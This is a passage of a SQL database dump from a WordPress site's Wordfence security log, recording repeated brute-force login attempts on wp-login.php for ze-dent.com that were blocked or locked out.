(4783, 0.000000, 1594796275.005980, 0x00000000000000000000ffff2e65ecdd, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4784, 0.000000, 1594797434.308237, 0x00000000000000000000ffff8b3b8840, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4785, 1594797833.318504, 1594797833.255700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4786, 1594799565.961135, 1594799565.915700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4787, 0.000000, 1594800240.243396, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4788, 1594801541.251120, 1594801540.905900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4789, 1594803520.428725, 1594803519.904300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4790, 0.000000, 1594804146.197524, 0x00000000000000000000ffffc0a9ff08, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4791, 0.000000, 1594804820.918404, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://schluesseldienst-schroeder.de/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4792, 1594805494.983745, 1594805494.680300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4793, 1594807468.466398, 1594807468.420400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4794, 1594809252.230969, 1594809251.654400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4795, 0.000000, 1594810236.026758, 0x00000000000000000000ffff81cc599f, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4796, 0.000000, 1594810452.027907, 0x00000000000000000000ffff8cee1639, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4797, 1594810934.352554, 1594810934.231300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4798, 1594812675.155525, 1594812675.099600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4799, 0.000000, 1594813068.278642, 0x00000000000000000000ffff2e65a873, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4800, 1594814342.664764, 1594814342.536500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4801, 0.000000, 1594815472.652929, 0x00000000000000000000ffff86d11e9b, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4802, 1594815957.442948, 1594815957.345500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4803, 1594817647.420414, 1594817647.356200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4804, 0.000000, 1594818784.137079, 0x00000000000000000000ffff669dc8b9, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4805, 1594819422.060302, 1594819422.019800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4806, 0.000000, 1594820146.659482, 0x00000000000000000000ffffc6c74860, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4807, 1594820994.377275, 1594820994.316500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4808, 0.000000, 1594821389.787898, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.polka-bistro-caffe.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4809, 1594822705.412321, 1594822705.316300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4810, 0.000000, 1594824086.020318, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://aurigon.mx/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4811, 0.000000, 1594824481.470752, 0x00000000000000000000ffff334b902b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4812, 1594824614.895159, 1594824614.831000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4813, 0.000000, 1594825054.710307, 0x00000000000000000000ffff33b23454, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4814, 0.000000, 1594825343.318643, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4815, 0.000000, 1594826483.644227, 0x00000000000000000000ffffb955efc3, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4816, 1594826543.120105, 1594826543.060900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4817, 0.000000, 1594827917.823716, 0x00000000000000000000ffff6d466421, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4818, 1594828446.052300, 1594828446.003700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4819, 0.000000, 1594828521.156357, 0x00000000000000000000ffff4ebdaa28, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4820, 1594830349.975699, 1594830349.879000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4821, 1594832017.501986, 1594832017.369000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4822, 0.000000, 1594832925.381279, 0x00000000000000000000ffff86d1feba, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4823, 1594833693.771444, 1594833693.654900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4824, 0.000000, 1594833728.353633, 0x00000000000000000000ffff867a784a, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4825, 0.000000, 1594834403.365577, 0x00000000000000000000ffff8cee1639, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4826, 1594835250.665507, 1594835250.614900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4827, 0.000000, 1594836712.649796, 0x00000000000000000000ffffa7472d23, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4828, 1594836863.147491, 1594836863.093400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4829, 1594838554.003943, 1594838553.909300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}');
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(4830, 0.000000, 1594839070.590118, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4831, 1594840156.653238, 1594840156.570700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4832, 0.000000, 1594841160.335886, 0x00000000000000000000ffff406f7e2b, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4833, 1594841771.174411, 1594841771.016100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4834, 0.000000, 1594843374.190091, 0x00000000000000000000ffffd455450e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4835, 1594843411.631808, 1594843411.569300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4836, 1594845069.584480, 1594845069.491200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4837, 0.000000, 1594845658.533996, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.rosegold.top/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4838, 1594846708.894779, 1594846708.819100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4839, 0.000000, 1594847879.083765, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4840, 0.000000, 1594848259.959730, 0x00000000000000000000ffff44b7b807, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4841, 1594850040.070470, 1594850039.737200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4842, 1594848371.832791, 1594848371.755000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4843, 0.000000, 1594850916.146398, 0x00000000000000000000ffff2f72971d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4844, 1594851695.208540, 1594851695.166500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4845, 1594855390.144627, 1594855389.649400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4846, 1594853479.878439, 1594853479.747000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
